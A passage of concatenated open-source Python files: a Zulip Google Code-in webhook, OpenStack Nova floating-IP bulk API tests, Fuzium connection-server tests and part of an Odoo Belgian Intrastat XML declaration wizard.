        # type: (Request) -> Generator[Request, None, None]
        request.method = 'GET'
        request.dont_filter = True
        yield request

    def error_callback(self, failure):
        # type: (Any) -> Optional[Generator[Any, None, None]]
        if hasattr(failure.value, 'response') and failure.value.response:
            response = failure.value.response
            if response.status == 404:
                raise Exception('Page not found: {}'.format(response))
            if response.status == 405 and response.request.method == 'HEAD':
                # Method 'HEAD' not allowed, repeat request with 'GET'
                return self.retry_request_with_get(response.request)
            self.log("Error! Please check link: {}".format(response), logging.ERROR)
        else:
            raise Exception(failure.value)
| apache-2.0 |
timabbott/zulip | zerver/webhooks/gci/view.py | 4 | 5316 | from typing import Any, Dict, Optional
from django.http import HttpRequest, HttpResponse
from zerver.decorator import api_key_only_webhook_view
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.webhooks.common import check_send_webhook_message
from zerver.models import UserProfile
# Message/topic formats shared by all the event-body builders below.
GCI_MESSAGE_TEMPLATE = '**{actor}** {action} the task [{task_name}]({task_url}).'
GCI_TOPIC_TEMPLATE = '{student_name}'
def build_instance_url(instance_id: str) -> str:
    """Return the GCI dashboard URL for a task instance."""
    return "https://codein.withgoogle.com/dashboard/task-instances/{}/".format(instance_id)
class UnknownEventType(Exception):
    """Raised when a payload's event_type has no registered handler."""
    pass
def get_abandon_event_body(payload: Dict[str, Any]) -> str:
    """Message for a student abandoning a task."""
    action = f"{payload['event_type']}ed"
    return GCI_MESSAGE_TEMPLATE.format(
        actor=payload['task_claimed_by'],
        action=action,
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_submit_event_body(payload: Dict[str, Any]) -> str:
    """Message for a student submitting a task."""
    action = f"{payload['event_type']}ted"
    return GCI_MESSAGE_TEMPLATE.format(
        actor=payload['task_claimed_by'],
        action=action,
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_comment_event_body(payload: Dict[str, Any]) -> str:
    """Message for a comment posted on a task."""
    action = f"{payload['event_type']}ed on"
    return GCI_MESSAGE_TEMPLATE.format(
        actor=payload['author'],
        action=action,
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_claim_event_body(payload: Dict[str, Any]) -> str:
    """Message for a student claiming a task."""
    action = f"{payload['event_type']}ed"
    return GCI_MESSAGE_TEMPLATE.format(
        actor=payload['task_claimed_by'],
        action=action,
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_approve_event_body(payload: Dict[str, Any]) -> str:
    """Message for a mentor approving a task."""
    action = f"{payload['event_type']}d"
    return GCI_MESSAGE_TEMPLATE.format(
        actor=payload['author'],
        action=action,
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_approve_pending_pc_event_body(payload: Dict[str, Any]) -> str:
    """Message for an approval that is pending parental consent."""
    base = GCI_MESSAGE_TEMPLATE.rstrip('.')
    template = f"{base} (pending parental consent)."
    return template.format(
        actor=payload['author'],
        action='approved',
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_needswork_event_body(payload: Dict[str, Any]) -> str:
    """Message for a submission sent back for more work."""
    base = GCI_MESSAGE_TEMPLATE.rstrip('.')
    template = f"{base} for more work."
    return template.format(
        actor=payload['author'],
        action='submitted',
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_extend_event_body(payload: Dict[str, Any]) -> str:
    """Message for a deadline extension, including the number of days."""
    days = payload['extension_days']
    base = GCI_MESSAGE_TEMPLATE.rstrip('.')
    # The f-string fills in the day count now; the named placeholders from
    # the base template survive for the .format() call below.
    template = f"{base} by {days} day(s)."
    return template.format(
        actor=payload['author'],
        action='extended the deadline for',
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_unassign_event_body(payload: Dict[str, Any]) -> str:
    """Message for a mentor unassigning a student from a task."""
    student = payload['task_claimed_by']
    return GCI_MESSAGE_TEMPLATE.format(
        actor=payload['author'],
        action=f'unassigned **{student}** from',
        task_name=payload['task_definition_name'],
        task_url=build_instance_url(payload['task_instance']),
    )
def get_outoftime_event_body(payload: Dict[str, Any]) -> str:
    """Message announcing that a task's deadline has passed."""
    task_name = payload['task_definition_name']
    task_url = build_instance_url(payload['task_instance'])
    return f'The deadline for the task [{task_name}]({task_url}) has passed.'
@api_key_only_webhook_view("Google-Code-In")
@has_request_variables
def api_gci_webhook(request: HttpRequest, user_profile: UserProfile,
                    payload: Dict[str, Any]=REQ(argument_type='body')) -> HttpResponse:
    """Webhook endpoint: turn a GCI event payload into a stream message."""
    event = get_event(payload)
    if event is not None:
        body = get_body_based_on_event(event)(payload)
        # One topic per student, so all of a student's events thread together.
        subject = GCI_TOPIC_TEMPLATE.format(
            student_name=payload['task_claimed_by'],
        )
        check_send_webhook_message(request, user_profile, subject, body)

    return json_success()
# Maps each supported payload event_type to its message-builder function.
EVENTS_FUNCTION_MAPPER = {
    'abandon': get_abandon_event_body,
    'approve': get_approve_event_body,
    'approve-pending-pc': get_approve_pending_pc_event_body,
    'claim': get_claim_event_body,
    'comment': get_comment_event_body,
    'extend': get_extend_event_body,
    'needswork': get_needswork_event_body,
    'outoftime': get_outoftime_event_body,
    'submit': get_submit_event_body,
    'unassign': get_unassign_event_body,
}
def get_event(payload: Dict[str, Any]) -> Optional[str]:
    """Return the payload's event type if we can handle it; raise otherwise."""
    event = payload['event_type']
    if event not in EVENTS_FUNCTION_MAPPER:
        raise UnknownEventType(f"Event '{event}' is unknown and cannot be handled")  # nocoverage
    return event
def get_body_based_on_event(event: str) -> Any:
    """Return the message-builder function registered for *event*."""
    return EVENTS_FUNCTION_MAPPER[event]
| apache-2.0 |
LoHChina/nova | nova/tests/unit/api/openstack/compute/contrib/test_floating_ips_bulk.py | 21 | 8799 | # Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import netaddr
from oslo_config import cfg
import webob
from nova.api.openstack.compute.contrib import floating_ips_bulk as fipbulk_v2
from nova.api.openstack.compute.plugins.v3 import floating_ips_bulk as\
fipbulk_v21
from nova import context
from nova import exception
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
CONF = cfg.CONF
class FloatingIPBulkV21(test.TestCase):
    """Tests for the v2.1 os-floating-ips-bulk API extension.

    Subclasses override floating_ips_bulk / bad_request to re-run the same
    tests against other API versions.
    """
    floating_ips_bulk = fipbulk_v21
    bad_request = exception.ValidationError

    def setUp(self):
        super(FloatingIPBulkV21, self).setUp()
        self.context = context.get_admin_context()
        self.controller = self.floating_ips_bulk.FloatingIPBulkController()
        self.req = fakes.HTTPRequest.blank('')

    def _setup_floating_ips(self, ip_range):
        # Create the range and verify the echoed creation response.
        body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
        res_dict = self.controller.create(self.req, body=body)
        response = {"floating_ips_bulk_create": {
            'ip_range': ip_range,
            'pool': CONF.default_floating_pool,
            'interface': CONF.public_interface}}
        self.assertEqual(res_dict, response)

    def test_create_ips(self):
        ip_range = '192.168.1.0/28'
        self._setup_floating_ips(ip_range)

    def test_create_ips_pool(self):
        # A non-default pool name should be echoed back in the response.
        ip_range = '10.0.1.0/29'
        pool = 'a new pool'
        body = {'floating_ips_bulk_create':
                {'ip_range': ip_range,
                 'pool': pool}}
        res_dict = self.controller.create(self.req, body=body)
        response = {"floating_ips_bulk_create": {
            'ip_range': ip_range,
            'pool': pool,
            'interface': CONF.public_interface}}
        self.assertEqual(res_dict, response)

    def test_list_ips(self):
        self._test_list_ips(self.req)

    def _test_list_ips(self, req):
        # index() should report every host address of the created range as
        # unassociated.
        ip_range = '192.168.1.1/28'
        self._setup_floating_ips(ip_range)
        res_dict = self.controller.index(req)

        ip_info = [{'address': str(ip_addr),
                    'pool': CONF.default_floating_pool,
                    'interface': CONF.public_interface,
                    'project_id': None,
                    'instance_uuid': None,
                    'fixed_ip': None}
                   for ip_addr in netaddr.IPNetwork(ip_range).iter_hosts()]
        response = {'floating_ip_info': ip_info}

        self.assertEqual(res_dict, response)

    def test_list_ips_associated(self):
        self._test_list_ips_associated(self.req)

    # mock.patch injects the mock as the last positional argument.
    @mock.patch('nova.objects.FloatingIPList.get_all')
    def _test_list_ips_associated(self, req, mock_get):
        instance_uuid = "fake-uuid"
        fixed_address = "10.0.0.1"
        floating_address = "192.168.0.1"
        fixed_ip = objects.FixedIP(instance_uuid=instance_uuid,
                                   address=fixed_address)
        floating_ip = objects.FloatingIP(address=floating_address,
                                         fixed_ip=fixed_ip,
                                         pool=CONF.default_floating_pool,
                                         interface=CONF.public_interface,
                                         project_id=None)
        floating_list = objects.FloatingIPList(objects=[floating_ip])
        mock_get.return_value = floating_list
        res_dict = self.controller.index(req)

        ip_info = [{'address': floating_address,
                    'pool': CONF.default_floating_pool,
                    'interface': CONF.public_interface,
                    'project_id': None,
                    'instance_uuid': instance_uuid,
                    'fixed_ip': fixed_address}]
        response = {'floating_ip_info': ip_info}

        self.assertEqual(res_dict, response)

    def test_list_ip_by_host(self):
        self._test_list_ip_by_host(self.req)

    def _test_list_ip_by_host(self, req):
        # Filtering by an unknown host yields a 404.
        ip_range = '192.168.1.1/28'
        self._setup_floating_ips(ip_range)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.controller.show, req, 'host')

    def test_delete_ips(self):
        self._test_delete_ips(self.req)

    def _test_delete_ips(self, req):
        ip_range = '192.168.1.0/29'
        self._setup_floating_ips(ip_range)

        body = {'ip_range': ip_range}
        res_dict = self.controller.update(req, "delete", body=body)

        response = {"floating_ips_bulk_delete": ip_range}
        self.assertEqual(res_dict, response)

        # Check that the IPs are actually deleted
        res_dict = self.controller.index(req)
        response = {'floating_ip_info': []}
        self.assertEqual(res_dict, response)

    def test_create_duplicate_fail(self):
        # Overlapping ranges must be rejected with a 409.
        ip_range = '192.168.1.0/30'
        self._setup_floating_ips(ip_range)

        ip_range = '192.168.1.0/29'
        body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
        self.assertRaises(webob.exc.HTTPConflict, self.controller.create,
                          self.req, body=body)

    def test_create_bad_cidr_fail(self):
        # netaddr can't handle /32 or 31 cidrs
        ip_range = '192.168.1.1/32'
        body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
        self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
                          self.req, body=body)

    def test_create_invalid_cidr_fail(self):
        ip_range = 'not a cidr'
        body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
        self.assertRaises(self.bad_request, self.controller.create,
                          self.req, body=body)
class FloatingIPBulkV2(FloatingIPBulkV21):
    """Re-runs the v2.1 tests against the legacy v2 extension, plus the
    admin-context checks that only the v2 API enforces."""
    floating_ips_bulk = fipbulk_v2
    bad_request = webob.exc.HTTPBadRequest

    def setUp(self):
        super(FloatingIPBulkV2, self).setUp()
        self.non_admin_req = fakes.HTTPRequest.blank('')
        self.admin_req = fakes.HTTPRequest.blank('', use_admin_context=True)

    def test_list_ips_with_non_admin(self):
        ip_range = '192.168.1.1/28'
        self._setup_floating_ips(ip_range)
        self.assertRaises(exception.AdminRequired,
                          self.controller.index, self.non_admin_req)

    def test_list_ip_with_non_admin(self):
        ip_range = '192.168.1.1/28'
        self._setup_floating_ips(ip_range)
        self.assertRaises(exception.AdminRequired, self.controller.show,
                          self.non_admin_req, "host")

    # The remaining inherited tests need an admin request under v2.
    def test_delete_ips(self):
        self._test_delete_ips(self.admin_req)

    def test_list_ip_by_host(self):
        self._test_list_ip_by_host(self.admin_req)

    def test_list_ips_associated(self):
        self._test_list_ips_associated(self.admin_req)

    def test_list_ips(self):
        self._test_list_ips(self.admin_req)
class FloatingIPBulkPolicyEnforcementV21(test.NoDBTestCase):
    """Verifies policy enforcement for every os-floating-ips-bulk action."""

    def setUp(self):
        super(FloatingIPBulkPolicyEnforcementV21, self).setUp()
        self.controller = fipbulk_v21.FloatingIPBulkController()
        self.req = fakes.HTTPRequest.blank('')

    def _common_policy_check(self, func, *arg, **kwarg):
        # Point the rule at a project the request context can't satisfy,
        # then assert the call is rejected with the expected message.
        rule_name = "os_compute_api:os-floating-ips-bulk"
        rule = {rule_name: "project:non_fake"}
        self.policy.set_rules(rule)
        exc = self.assertRaises(
            exception.PolicyNotAuthorized, func, *arg, **kwarg)
        self.assertEqual(
            "Policy doesn't allow %s to be performed." % rule_name,
            exc.format_message())

    def test_index_policy_failed(self):
        self._common_policy_check(self.controller.index, self.req)

    def test_show_ip_policy_failed(self):
        self._common_policy_check(self.controller.show, self.req, "host")

    def test_create_policy_failed(self):
        ip_range = '192.168.1.0/28'
        body = {'floating_ips_bulk_create': {'ip_range': ip_range}}
        self._common_policy_check(self.controller.create, self.req, body=body)

    def test_update_policy_failed(self):
        ip_range = '192.168.1.0/29'
        body = {'ip_range': ip_range}
        self._common_policy_check(self.controller.update, self.req,
                                  "delete", body=body)
| apache-2.0 |
kustomzone/Fuzium | core/src/Test/TestConnectionServer.py | 7 | 3354 | import time
import gevent
import pytest
from Crypt import CryptConnection
from Connection import ConnectionServer
@pytest.mark.usefixtures("resetSettings")
class TestConnection:
    """Integration tests for ConnectionServer: a second server on port 1545
    connects back to the ``file_server`` fixture on 1544 and the tests
    observe handshake, encryption, bookkeeping and flood protection."""

    def testSslConnection(self, file_server):
        """A default connection should complete the handshake encrypted."""
        file_server.ip_incoming = {}  # Reset flood protection
        client = ConnectionServer("127.0.0.1", 1545)
        assert file_server != client
        # Connect to myself
        connection = client.getConnection("127.0.0.1", 1544)
        # Server side must register exactly one connection/peer IP.
        assert len(file_server.connections) == 1
        assert len(file_server.ips) == 1
        assert connection.handshake
        assert connection.crypt
        # Close connection
        connection.close()
        client.stop()
        time.sleep(0.01)  # give the server a moment to drop its bookkeeping
        assert len(file_server.connections) == 0
        assert len(file_server.ips) == 0

    def testRawConnection(self, file_server):
        """With no crypto available the connection must fall back to plain."""
        file_server.ip_incoming = {}  # Reset flood protection
        client = ConnectionServer("127.0.0.1", 1545)
        assert file_server != client
        # Remove all supported crypto
        crypt_supported_bk = CryptConnection.manager.crypt_supported
        CryptConnection.manager.crypt_supported = []
        connection = client.getConnection("127.0.0.1", 1544)
        assert len(file_server.connections) == 1
        assert not connection.crypt
        # Close connection
        connection.close()
        client.stop()
        time.sleep(0.01)
        assert len(file_server.connections) == 0
        # Reset supported crypts
        CryptConnection.manager.crypt_supported = crypt_supported_bk

    def testPing(self, file_server, site):
        """A live connection answers ping."""
        file_server.ip_incoming = {}  # Reset flood protection
        client = ConnectionServer("127.0.0.1", 1545)
        connection = client.getConnection("127.0.0.1", 1544)
        assert connection.ping()
        connection.close()
        client.stop()

    def testGetConnection(self, file_server):
        """getConnection must reuse connections by ip/port and by peer_id."""
        file_server.ip_incoming = {}  # Reset flood protection
        client = ConnectionServer("127.0.0.1", 1545)
        connection = client.getConnection("127.0.0.1", 1544)

        # Get connection by ip/port
        connection2 = client.getConnection("127.0.0.1", 1544)
        assert connection == connection2

        # Get connection by peerid
        assert not client.getConnection("127.0.0.1", 1544, peer_id="notexists", create=False)
        connection2 = client.getConnection("127.0.0.1", 1544, peer_id=connection.handshake["peer_id"], create=False)
        assert connection2 == connection

        connection.close()
        client.stop()

    def testFloodProtection(self, file_server):
        """The 7th connection inside a minute from one IP must be refused."""
        file_server.ip_incoming = {}  # Reset flood protection
        whitelist = file_server.whitelist  # Save for reset
        file_server.whitelist = []  # Disable 127.0.0.1 whitelist
        client = ConnectionServer("127.0.0.1", 1545)

        # Only allow 6 connection in 1 minute
        for reconnect in range(6):
            connection = client.getConnection("127.0.0.1", 1544)
            assert connection.handshake
            connection.close()

        # The 7. one will timeout
        with pytest.raises(gevent.Timeout):
            with gevent.Timeout(0.1):
                connection = client.getConnection("127.0.0.1", 1544)

        # Reset whitelist
        file_server.whitelist = whitelist
| mit |
Grirrane/odoo | addons/l10n_be_intrastat/wizard/xml_decl.py | 205 | 17873 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Odoo, Open Source Business Applications
# Copyright (C) 2014-2015 Odoo S.A. <http://www.odoo.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
import xml.etree.ElementTree as ET
from collections import namedtuple
from datetime import datetime
from openerp import exceptions, SUPERUSER_ID, tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
INTRASTAT_XMLNS = 'http://www.onegate.eu/2010-01-01'
class xml_decl(osv.TransientModel):
    """
    Intrastat XML Declaration wizard.

    Collects month/year/flow options from the user, aggregates the matching
    invoice lines and produces the ONEGATE XML file expected by the Belgian
    National Bank (NBB).
    """
    _name = "l10n_be_intrastat_xml.xml_decl"
    _description = 'Intrastat XML Declaration'

    def _get_tax_code(self, cr, uid, context=None):
        """Default: the root tax chart of the current user's company."""
        obj_tax_code = self.pool.get('account.tax.code')
        obj_user = self.pool.get('res.users')
        company_id = obj_user.browse(cr, uid, uid, context=context).company_id.id
        tax_code_ids = obj_tax_code.search(cr, uid, [('company_id', '=', company_id),
                                                     ('parent_id', '=', False)],
                                           context=context)
        return tax_code_ids and tax_code_ids[0] or False

    def _get_def_monthyear(self, cr, uid, context=None):
        """Return (year, month) strings for 'today' in the user's context."""
        td = datetime.strptime(fields.date.context_today(self, cr, uid, context=context),
                               tools.DEFAULT_SERVER_DATE_FORMAT).date()
        return td.strftime('%Y'), td.strftime('%m')

    def _get_def_month(self, cr, uid, context=None):
        """Default month ('01'..'12') for the wizard."""
        return self._get_def_monthyear(cr, uid, context=context)[1]

    def _get_def_year(self, cr, uid, context=None):
        """Default 4-digit year for the wizard."""
        return self._get_def_monthyear(cr, uid, context=context)[0]

    _columns = {
        'name': fields.char('File Name'),
        'month': fields.selection([('01','January'), ('02','February'), ('03','March'),
                                   ('04','April'), ('05','May'), ('06','June'), ('07','July'),
                                   ('08','August'), ('09','September'), ('10','October'),
                                   ('11','November'), ('12','December')], 'Month', required=True),
        'year': fields.char('Year', size=4, required=True),
        'tax_code_id': fields.many2one('account.tax.code', 'Company Tax Chart',
                                       domain=[('parent_id', '=', False)], required=True),
        # Reporting obligation level per flow direction ('be-exempt' skips
        # that flow entirely in create_xml below).
        'arrivals': fields.selection([('be-exempt', 'Exempt'),
                                      ('be-standard', 'Standard'),
                                      ('be-extended', 'Extended')],
                                     'Arrivals', required=True),
        'dispatches': fields.selection([('be-exempt', 'Exempt'),
                                        ('be-standard', 'Standard'),
                                        ('be-extended', 'Extended')],
                                       'Dispatches', required=True),
        'file_save': fields.binary('Intrastat Report File', readonly=True),
        'state': fields.selection([('draft', 'Draft'), ('download', 'Download')], string="State"),
    }

    _defaults = {
        'arrivals': 'be-standard',
        'dispatches': 'be-standard',
        'name': 'intrastat.xml',
        'tax_code_id': _get_tax_code,
        'month': _get_def_month,
        'year': _get_def_year,
        'state': 'draft',
    }

    def _company_warning(self, cr, uid, translated_msg, context=None):
        """ Raise a error with custom message, asking user to configure company settings """
        xmlid_mod = self.pool['ir.model.data']
        action_id = xmlid_mod.xmlid_to_res_id(cr, uid, 'base.action_res_company_form')
        raise exceptions.RedirectWarning(
            translated_msg, action_id, _('Go to company configuration screen'))

    def create_xml(self, cr, uid, ids, context=None):
        """Creates xml that is to be exported and sent to estate for partner vat intra.
        :return: Value for next action.
        :rtype: dict
        """
        decl_datas = self.browse(cr, uid, ids[0])
        company = decl_datas.tax_code_id.company_id
        # Country and company registry number are mandatory for the header.
        if not (company.partner_id and company.partner_id.country_id and
                company.partner_id.country_id.id):
            self._company_warning(
                cr, uid,
                _('The country of your company is not set, '
                  'please make sure to configure it first.'),
                context=context)
        kbo = company.company_registry
        if not kbo:
            self._company_warning(
                cr, uid,
                _('The registry number of your company is not set, '
                  'please make sure to configure it first.'),
                context=context)
        if len(decl_datas.year) != 4:
            raise exceptions.Warning(_('Year must be 4 digits number (YYYY)'))

        #Create root declaration
        decl = ET.Element('DeclarationReport')
        decl.set('xmlns', INTRASTAT_XMLNS)

        #Add Administration elements
        admin = ET.SubElement(decl, 'Administration')
        fromtag = ET.SubElement(admin, 'From')
        fromtag.text = kbo
        fromtag.set('declarerType', 'KBO')
        ET.SubElement(admin, 'To').text = "NBB"
        ET.SubElement(admin, 'Domain').text = "SXX"
        # One <Report> per declared flow; 'be-exempt' produces none.
        # Lines are gathered as SUPERUSER to bypass record rules.
        if decl_datas.arrivals == 'be-standard':
            decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
                                        dispatchmode=False, extendedmode=False, context=context))
        elif decl_datas.arrivals == 'be-extended':
            decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
                                        dispatchmode=False, extendedmode=True, context=context))
        if decl_datas.dispatches == 'be-standard':
            decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
                                        dispatchmode=True, extendedmode=False, context=context))
        elif decl_datas.dispatches == 'be-extended':
            decl.append(self._get_lines(cr, SUPERUSER_ID, ids, decl_datas, company,
                                        dispatchmode=True, extendedmode=True, context=context))

        #Get xml string with declaration
        data_file = ET.tostring(decl, encoding='UTF-8', method='xml')

        #change state of the wizard
        self.write(cr, uid, ids,
                   {'name': 'intrastat_%s%s.xml' % (decl_datas.year, decl_datas.month),
                    'file_save': base64.encodestring(data_file),
                    'state': 'download'},
                   context=context)
        return {
            'name': _('Save'),
            'context': context,
            'view_type': 'form',
            'view_mode': 'form',
            'res_model': 'l10n_be_intrastat_xml.xml_decl',
            'type': 'ir.actions.act_window',
            'target': 'new',
            'res_id': ids[0],
        }

    def _get_lines(self, cr, uid, ids, decl_datas, company, dispatchmode=False,
                   extendedmode=False, context=None):
        """Build one <Report> element for a single flow direction.

        Invoice lines of the selected month are grouped by the intrastat
        key (transaction code, country, region, commodity code, transport,
        incoterm) and their value/weight/supplementary units are summed.
        """
        intrastatcode_mod = self.pool['report.intrastat.code']
        invoiceline_mod = self.pool['account.invoice.line']
        product_mod = self.pool['product.product']
        region_mod = self.pool['l10n_be_intrastat.region']
        warehouse_mod = self.pool['stock.warehouse']

        # Declaration code 29 = dispatches, 19 = arrivals; refunds count
        # in the opposite flow of their originating invoice type.
        if dispatchmode:
            mode1 = 'out_invoice'
            mode2 = 'in_refund'
            declcode = "29"
        else:
            mode1 = 'in_invoice'
            mode2 = 'out_refund'
            declcode = "19"

        decl = ET.Element('Report')
        if not extendedmode:
            decl.set('code', 'EX%sS' % declcode)
        else:
            decl.set('code', 'EX%sE' % declcode)
        decl.set('date', '%s-%s' % (decl_datas.year, decl_datas.month))
        datas = ET.SubElement(decl, 'Data')
        if not extendedmode:
            datas.set('form', 'EXF%sS' % declcode)
        else:
            datas.set('form', 'EXF%sE' % declcode)
        datas.set('close', 'true')

        # Grouping key for aggregation; field names follow the ONEGATE
        # "Dim" property names used when serializing below.
        intrastatkey = namedtuple("intrastatkey",
                                  ['EXTRF', 'EXCNT', 'EXTTA', 'EXREG',
                                   'EXGO', 'EXTPC', 'EXDELTRM'])
        entries = {}

        # Select open/paid invoice lines of the period for intrastat
        # countries other than the company's own, excluding services.
        sqlreq = """
            select
                inv_line.id
            from
                account_invoice_line inv_line
                join account_invoice inv on inv_line.invoice_id=inv.id
                left join res_country on res_country.id = inv.intrastat_country_id
                left join res_partner on res_partner.id = inv.partner_id
                left join res_country countrypartner on countrypartner.id = res_partner.country_id
                join product_product on inv_line.product_id=product_product.id
                join product_template on product_product.product_tmpl_id=product_template.id
            where
                inv.state in ('open','paid')
                and inv.company_id=%s
                and not product_template.type='service'
                and (res_country.intrastat=true or (inv.intrastat_country_id is null
                                                    and countrypartner.intrastat=true))
                and ((res_country.code is not null and not res_country.code=%s)
                     or (res_country.code is null and countrypartner.code is not null
                         and not countrypartner.code=%s))
                and inv.type in (%s, %s)
                and to_char(inv.date_invoice, 'YYYY')=%s
                and to_char(inv.date_invoice, 'MM')=%s
            """

        cr.execute(sqlreq, (company.id, company.partner_id.country_id.code,
                            company.partner_id.country_id.code, mode1, mode2,
                            decl_datas.year, decl_datas.month))
        lines = cr.fetchall()
        invoicelines_ids = [rec[0] for rec in lines]
        invoicelines = invoiceline_mod.browse(cr, uid, invoicelines_ids, context=context)
        for inv_line in invoicelines:

            #Check type of transaction
            if inv_line.invoice_id.intrastat_transaction_id:
                extta = inv_line.invoice_id.intrastat_transaction_id.code
            else:
                extta = "1"
            #Check country
            if inv_line.invoice_id.intrastat_country_id:
                excnt = inv_line.invoice_id.intrastat_country_id.code
            else:
                excnt = inv_line.invoice_id.partner_id.country_id.code

            #Check region
            #If purchase, comes from purchase order, linked to a location,
            #which is linked to the warehouse
            #if sales, the sale order is linked to the warehouse
            #if sales, from a delivery order, linked to a location,
            #which is linked to the warehouse
            #If none found, get the company one.
            exreg = None
            if inv_line.invoice_id.type in ('in_invoice', 'in_refund'):
                #comes from purchase
                POL = self.pool['purchase.order.line']
                poline_ids = POL.search(
                    cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
                if poline_ids:
                    purchaseorder = POL.browse(cr, uid, poline_ids[0], context=context).order_id
                    region_id = warehouse_mod.get_regionid_from_locationid(
                        cr, uid, purchaseorder.location_id.id, context=context)
                    if region_id:
                        exreg = region_mod.browse(cr, uid, region_id).code
            elif inv_line.invoice_id.type in ('out_invoice', 'out_refund'):
                #comes from sales
                soline_ids = self.pool['sale.order.line'].search(
                    cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
                if soline_ids:
                    saleorder = self.pool['sale.order.line'].browse(
                        cr, uid, soline_ids[0], context=context).order_id
                    if saleorder and saleorder.warehouse_id and saleorder.warehouse_id.region_id:
                        exreg = region_mod.browse(
                            cr, uid, saleorder.warehouse_id.region_id.id, context=context).code

            if not exreg:
                if company.region_id:
                    exreg = company.region_id.code
                else:
                    self._company_warning(
                        cr, uid,
                        _('The Intrastat Region of the selected company is not set, '
                          'please make sure to configure it first.'),
                        context=context)

            #Check commodity codes
            intrastat_id = product_mod.get_intrastat_recursively(
                cr, uid, inv_line.product_id.id, context=context)
            if intrastat_id:
                exgo = intrastatcode_mod.browse(cr, uid, intrastat_id, context=context).name
            else:
                raise exceptions.Warning(
                    _('Product "%s" has no intrastat code, please configure it') %
                    inv_line.product_id.display_name)

            #In extended mode, 2 more fields required
            if extendedmode:
                #Check means of transport
                if inv_line.invoice_id.transport_mode_id:
                    extpc = inv_line.invoice_id.transport_mode_id.code
                elif company.transport_mode_id:
                    extpc = company.transport_mode_id.code
                else:
                    self._company_warning(
                        cr, uid,
                        _('The default Intrastat transport mode of your company '
                          'is not set, please make sure to configure it first.'),
                        context=context)

                #Check incoterm
                if inv_line.invoice_id.incoterm_id:
                    exdeltrm = inv_line.invoice_id.incoterm_id.code
                elif company.incoterm_id:
                    exdeltrm = company.incoterm_id.code
                else:
                    self._company_warning(
                        cr, uid,
                        _('The default Incoterm of your company is not set, '
                          'please make sure to configure it first.'),
                        context=context)
            else:
                extpc = ""
                exdeltrm = ""

            linekey = intrastatkey(EXTRF=declcode, EXCNT=excnt,
                                   EXTTA=extta, EXREG=exreg, EXGO=exgo,
                                   EXTPC=extpc, EXDELTRM=exdeltrm)

            #We have the key
            #calculate amounts
            if inv_line.price_unit and inv_line.quantity:
                amount = inv_line.price_unit * inv_line.quantity
            else:
                amount = 0
            # Convert quantity to the product's stock UoM when the line's
            # unit of sale belongs to the same category; otherwise use the
            # quantity as-is.
            if (not inv_line.uos_id.category_id
                    or not inv_line.product_id.uom_id.category_id
                    or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
                weight = inv_line.product_id.weight_net * inv_line.quantity
            else:
                weight = (inv_line.product_id.weight_net *
                          inv_line.quantity * inv_line.uos_id.factor)
            if (not inv_line.uos_id.category_id or not inv_line.product_id.uom_id.category_id
                    or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
                supply_units = inv_line.quantity
            else:
                supply_units = inv_line.quantity * inv_line.uos_id.factor

            # Accumulate (value, weight, units) per grouping key.
            amounts = entries.setdefault(linekey, (0, 0, 0))
            amounts = (amounts[0] + amount, amounts[1] + weight, amounts[2] + supply_units)
            entries[linekey] = amounts

        # Serialize one <Item> per aggregated key; decimals use a comma
        # as required by the ONEGATE format.
        numlgn = 0
        for linekey in entries:
            numlgn += 1
            amounts = entries[linekey]
            item = ET.SubElement(datas, 'Item')
            self._set_Dim(item, 'EXSEQCODE', unicode(numlgn))
            self._set_Dim(item, 'EXTRF', unicode(linekey.EXTRF))
            self._set_Dim(item, 'EXCNT', unicode(linekey.EXCNT))
            self._set_Dim(item, 'EXTTA', unicode(linekey.EXTTA))
            self._set_Dim(item, 'EXREG', unicode(linekey.EXREG))
            self._set_Dim(item, 'EXTGO', unicode(linekey.EXGO))
            if extendedmode:
                self._set_Dim(item, 'EXTPC', unicode(linekey.EXTPC))
                self._set_Dim(item, 'EXDELTRM', unicode(linekey.EXDELTRM))
            self._set_Dim(item, 'EXTXVAL', unicode(round(amounts[0], 0)).replace(".", ","))
